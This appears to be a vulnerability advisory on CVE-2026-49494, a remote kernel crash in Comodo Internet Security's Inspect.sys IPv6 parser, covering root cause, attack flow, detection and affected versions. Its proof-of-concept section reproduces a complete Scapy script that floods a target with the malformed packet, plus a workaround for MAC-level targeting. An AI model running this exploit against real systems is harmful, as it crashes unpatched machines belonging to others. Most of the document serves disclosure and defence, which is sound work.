Introduction
A single malformed IPv6 packet can remotely crash any Windows machine running Comodo Internet Security, and the firewall itself is the vulnerable component, meaning blocking all ports offers zero protection. Discovered by Marcus Hutchins (MalwareTech) and disclosed on June 7, 2026, CVE-2026-49494 is an unpatched zero day in Comodo's kernel mode firewall driver Inspect.sys that triggers a Blue Screen of Death through an integer underflow in the IPv6 extension header parser.
Comodo Internet Security is an endpoint protection suite encompassing firewall, antivirus, and intrusion prevention capabilities, with over 85 million reported installations worldwide. The company also held the leading position in the global SSL/TLS certificate market with approximately 37.1% market share. Given this scale, the vulnerability has a substantial potential blast radius across consumer and small business environments where Comodo is deployed as the primary host firewall.
Technical Information
Root Cause: CWE-191 Integer Underflow
The vulnerability is classified under CWE-191 (Integer Underflow / Wrap or Wraparound), defined as a weakness where "the product subtracts one value from another, such that the result is less than the minimum allowable integer value, causing the value to wrap around to the maximum allowable value."
The vulnerable code resides in the IPv6 packet parser within Inspect.sys, Comodo Internet Security's kernel mode firewall driver. During IPv6 header chain traversal, the parser reads the Payload Length field from the IPv6 fixed header and stores it in packet_desc->payload_length as an unsigned 64-bit integer. As it iterates through each IPv6 extension header, it performs the operation:
packet_desc->payload_length -= ext_hdr_len
at assembly address 0x1400ee21 without validating that payload_length remains non-negative after each subtraction.
When a crafted packet declares a Payload Length smaller than the cumulative size of its extension headers, the unsigned subtraction wraps around. For example, if the declared payload length is 8 and the extension header is 16 bytes, the result is 8 - 16 = 0xFFFFFFFFFFFFFFF8 (approximately 18.4 quintillion), a near-maximal 64-bit unsigned integer.
Two Crash Paths
The underflowed value propagates through two distinct code paths, each leading to a system crash:
Path 1: Out of Bounds Read (No Open Port Required)
After the underflow, the corrupted payload length is truncated to 16 bits and passed to ScanForHTTPArtifacts, a function that scans for WebDAV related data. This function attempts to read past the end of its allocated memory buffer into unallocated memory. Because Inspect.sys runs at DISPATCH_LEVEL IRQL, a page fault from this invalid memory access cannot be handled by the Windows memory manager and triggers an immediate system crash. This is the primary attack vector and requires no open ports on the target.
Path 2: Oversized memcpy (Requires Open TCP Port)
On a separate branch, the corrupted size is truncated to a 32-bit value, causing a memcpy operation that attempts to copy up to approximately 4 GB of data. This path requires a full TCP three-way handshake, meaning the target must have at least one open TCP port. Even if the scanner function crash were somehow avoided, this memcpy is guaranteed to crash the system.
| Code Path | Function | Size Truncation | Impact | Requires Open Port |
|---|---|---|---|---|
| Out of bounds read | ScanForHTTPArtifacts | 16-bit | Invalid memory read at DISPATCH_LEVEL, BSOD | No |
| Oversized memcpy | Kernel copy routine | 32-bit (~4 GB) | Guaranteed kernel pool overflow, BSOD | Yes (TCP handshake) |
Why Firewall Rules Cannot Protect Against This
The critical design flaw is architectural: the IPv6 parsing routine executes before firewall rule enforcement. As Hutchins notes, "it doesn't matter whether the target port is open or closed, unless the system has a firewall for its firewall." The very component designed to filter malicious traffic is the one that contains the vulnerability, and it processes packets at a stage where no filtering decisions have yet been made.
Attack Flow
- The attacker crafts a single IPv6 packet with a
Payload Lengthfield set to 8, while including a Destination Options extension header that is actually 16 bytes long. - The Destination Options header type (type 60) is chosen because it is designated for the final destination host and is the least likely to be validated or dropped by transit routers.
- The attacker sends the packet to the target system's IPv6 address. No authentication, user interaction, or special privileges are required.
- The Comodo firewall driver receives the packet and begins parsing the IPv6 header chain before evaluating any firewall rules.
- The unsigned 64-bit payload length underflows from 8 to
0xFFFFFFFFFFFFFFF8. - The corrupted value causes an out of bounds read in the Windows kernel at
DISPATCH_LEVEL, producing an immediate BSOD.
RCE Assessment
Hutchins assessed the vulnerability as denial of service only, stating he is "almost certain it's unexploitable" for remote code execution. The 4 GB kernel pool overflow requirement on the memcpy path and the constraints of the out of bounds write make reliable code execution highly unlikely. The primary risk is system crash and availability impact.
Proof of Concept
A public, fully functional proof of concept exists in the MalwareTech/ComoDoS GitHub repository, published by Marcus Hutchins on June 3, 2026. The exploit is a Python 3 script using Scapy to craft and send the malformed IPv6 packet:
#!/usr/bin/env python3 from scapy.all import * from scapy.layers.inet import TCP from scapy.layers.inet6 import PadN, IPv6ExtHdrDestOpt, IPv6 def build_poc(dst_ip): pad = PadN(optdata=b"\x00" * 8) ext = IPv6ExtHdrDestOpt(nh=6, options=[pad]) tcp = TCP(sport=1337, dport=80, flags="S", seq=0, ack=1, window=0x2000) ipv6 = IPv6(dst=dst_ip, nh=60, hlim=64, plen=8) pkt = ipv6 / ext / tcp return pkt DST_IP = "::dead:beef" exploit_pkt = build_poc(DST_IP) for i in range(0, 6000): send(exploit_pkt, verbose=False)
The key exploit primitive: the IPv6 Next Header field is set to 60 (Destination Options), and the Payload Length (plen) is set to 8. The attached Destination Options extension header is 16 bytes total (8 byte mandatory header plus 8 byte PadN option data). When the driver computes 8 - 16, the unsigned subtraction underflows. The packet is sent 6,000 times to ensure the crash is triggered reliably, though a single packet is sufficient in principle.
A demonstration video showing a remote BSOD of a target system is also available. The accompanying detailed technical write-up was published on the MalwareTech blog. This was disclosed as an unpatched zero day after failed coordinated disclosure attempts with Comodo.
If the sender lacks native IPv6 connectivity, the exploit can still be tested by enabling the "Filter IPv6 traffic" option in the Comodo firewall and sending the malicious frame directly to the target NIC's MAC address.
Detection Methods
As of June 7, 2026, CVE-2026-49494 does not have formal detection rules in Sigma, Snort/Suricata, or YARA. Tenable's CVE page explicitly states "No plugins found for this CVE." However, the detailed technical write-up and PoC provide a strong foundation for building custom detection.
Network Level Detection
The exploit packet has a very specific and anomalous structure that network monitoring solutions can flag. Defenders should configure intrusion detection systems (Zeek/Bro, Suricata, or custom packet inspection) to alert on IPv6 packets where the Payload Length field in the fixed header is less than the cumulative size of the extension headers that follow it. Any such packet is inherently malformed.
Specific indicators from the published PoC:
- IPv6 Next Header field set to 60 (Destination Options extension header)
- IPv6 Payload Length (
plen) set to 8, while the Destination Options header is actually 16 bytes long (8 byte mandatory header plus 8 bytes of PadN option data) - A TCP segment (Next Header = 6) following the extension header, typically with characteristics like sport=1337, dport=80, and SYN flag set, though the specific TCP parameters are not essential to the exploit logic
The core detection logic is straightforward: any IPv6 packet where the declared payload length is smaller than the extension header chain it contains is inherently invalid and a strong indicator of exploitation attempts against this class of vulnerability.
Host Level Detection
Because the exploit triggers a kernel crash, the most visible host indicator is a Windows BSOD. Defenders should monitor:
- BugCheck events (Event ID 1001) from the Windows Error Reporting source, logged after an unexpected system restart caused by a BSOD. If these occur on systems running Comodo Internet Security, especially when correlated with inbound IPv6 network traffic, they are a strong indicator of exploitation.
- Inspect.sys in crash dump analysis: Kernel minidumps or full memory dumps generated by the BSOD will reference the faulting driver. Post-mortem analysis should look for
Inspect.sysin the call stack, which would confirm the Comodo firewall driver as the crash source.
Asset Level Detection
The primary asset level approach is to inventory systems running Comodo Internet Security version 12.3.4.8162 or earlier with the Inspect.sys firewall driver loaded. Any such system is vulnerable. Defenders should check whether IPv6 is enabled on the network interface of affected hosts, as disabling IPv6 on the NIC or at the network level would prevent exploitation over the network (though local exploitation is still possible by sending directly to the NIC's MAC address with the "Filter IPv6 traffic" option enabled in Comodo).
Affected Systems and Versions
Based on the VulnCheck advisory, the following versions are affected:
- Comodo Internet Security version 12.3.4.8162 and all prior versions
- The vulnerable component is the kernel mode firewall driver
Inspect.sys - Any Windows system with Comodo Internet Security installed and the firewall driver active is vulnerable
- Systems with IPv6 enabled on any network interface are exploitable remotely
- Systems with IPv6 disabled but the "Filter IPv6 traffic" option enabled in Comodo settings are exploitable via direct MAC address targeting on the local network segment
- Firewall configuration (including blocking all ports) provides no protection, as the vulnerable parser executes before rule enforcement
No patched version has been identified as of June 7, 2026.
Vendor Security History
Comodo's security track record includes several notable incidents that provide context for this vulnerability:
2011: Certificate Authority Partner Breach. A Registration Authority partner of Comodo suffered an internal security breach. The attacker fraudulently obtained SSL certificates for major sites including google.com, mail.google.com, and login.live.com. Browser vendors including Mozilla, Google, and Microsoft responded by revoking the compromised certificates. This incident was particularly significant because it compromised the trust model of the SSL/TLS ecosystem.
2019: Forum Data Breach. A Comodo database was hacked, exposing account login information for up to 245,000 forum users, including usernames, real names, email addresses, and hashed passwords.
2024: Local Privilege Escalation (CVE-2024-7248). A local privilege escalation vulnerability in Comodo Internet Security Pro allowed local attackers to escalate privileges on affected installations.
2026: Remote Kernel DoS (CVE-2026-49494). The current vulnerability, an integer underflow in Inspect.sys enabling remote, unauthenticated system crash.
The pattern of kernel mode driver vulnerabilities (CVE-2024-7248 for local privilege escalation and now CVE-2026-49494 for remote DoS) raises questions about code review practices for Inspect.sys and other low-level components. The fact that the IPv6 parser lacks basic bounds validation on an arithmetic operation suggests insufficient fuzzing or formal verification of packet processing code paths.
It is also worth noting that the vulnerability was discovered through an AI-assisted BYOVD (Bring Your Own Vulnerable Driver) research pipeline, where AI flagged an older version of Inspect.sys and manual analysis by Hutchins confirmed the same bug existed in the current driver version. This discovery method may signal a broader trend in vulnerability research that could surface additional issues in similar kernel drivers.
References
- NVD: CVE-2026-49494
- MalwareTech Blog: Exploiting a Remote Kernel Vulnerability in Comodo Internet Security
- GitHub: MalwareTech/ComoDoS PoC Repository
- ComoDoS PoC Source Code (poc.py)
- ComoDoS README
- VulnCheck Advisory: Comodo Internet Security Inspect.sys IPv6 Integer Underflow Remote Denial of Service
- Tenable: CVE-2026-49494
- MITRE CWE-191: Integer Underflow (Wrap or Wraparound)
- CyberSecurityNews: Comodo Internet Security 0-Day Vulnerability
- CyberPress: Comodo Internet Security 0-Day Vulnerability Can Crash Systems
- CISA Known Exploited Vulnerabilities Catalog
- NVD: CVE-2024-7248 (Prior Comodo Vulnerability)
- Mozilla Security Blog: Comodo Certificate Issue Follow Up (2011)
- CRN: Comodo Breach Exposes Account Login Info For Up To 245,000 Users
- PR Newswire: Comodo Expands Its Global Digital Certificate Authority Market Share



